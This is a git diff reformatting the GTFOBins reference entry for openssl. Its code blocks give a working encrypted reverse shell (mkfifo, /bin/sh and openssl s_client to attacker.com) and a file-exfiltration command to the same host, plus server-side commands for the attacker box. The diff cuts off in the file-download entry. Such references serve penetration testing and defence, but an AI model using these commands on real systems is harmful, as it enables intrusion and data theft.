diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 5c7721c..e3e77d0 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -1,20 +1,38 @@ --- functions: reverse-shell: - - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted. + - description: | + To receive the shell run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 + + Communication between attacker and target will be encrypted. code: | RHOST=attacker.com RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s file-upload: - - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file. + - description: | + To collect the file run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save + + Send a file to a TCP port, transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345 LFILE=file_to_send openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" file-download: - - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file. + - description: | + To send the file run the following on the attacker box: + + openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send + + Fetch a file from a TCP port, transmission will be encrypted. code: | RHOST=attacker.com RPORT=12345